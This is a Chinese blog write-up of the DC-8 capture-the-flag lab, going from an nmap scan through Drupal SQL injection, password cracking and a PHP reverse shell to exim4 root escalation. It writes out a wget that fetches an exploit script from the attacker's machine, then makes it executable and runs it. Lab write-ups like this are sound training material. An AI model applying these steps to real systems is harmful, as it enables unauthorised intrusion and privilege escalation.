DC-8靶机实战

DC-8靶机实战

nmap扫一下
主机发现
DC-8靶机实战_第1张图片
全扫描:
DC-8靶机实战_第2张图片
用drupal cms扫描器扫一下

7.67版本,卡得不上不下的,难搞喔
发现了存在php这个插件,如果能进到后台,执行一波php代码,反弹shell就好了

后面又是各种一顿扫,没有发现什么有用的,然后就去手动到网站找漏洞
后面遇到一个页面。以为有xml注入,结果尝试无果

最后找到了一个注入点
DC-8靶机实战_第3张图片
数字型注入,手工几下就拿到了users里面的admin 的口令和john 口令

john爆破了一下,admin的口令没有爆破出来,到是拿到john 口令

后台登录:
DC-8靶机实战_第4张图片
没有权限增加content,但能修改一个content
DC-8靶机实战_第5张图片
DC-8靶机实战_第6张图片
加入反弹shell代码,选择php code

然后到该页面填写提交,记得还是要填规范。不然报错也不会执行里面的反弹shell的
DC-8靶机实战_第7张图片
然后找提取的突破口
DC-8靶机实战_第8张图片
发现了exim4,看看版本
DC-8靶机实战_第9张图片
msf 精确搜索
DC-8靶机实战_第10张图片
选择本地权限提升的脚本
改成root.sh

看了一下内容,本地权限提升参数 -m netcat
kali打开http服务

下载到靶机
wget http://192.168.206.128:8000/root.sh
记得下载到可写目录

chmod +x root.sh
执行
在这里插入图片描述
出现了这个问题,脚本必须设置成unix

vim打开。set ff=unix
然后保存退出,再下载
执行

DC-8靶机实战_第11张图片
DC-8靶机实战_第12张图片
提权成功

读取flag

你可能感兴趣的:(DC,信息安全)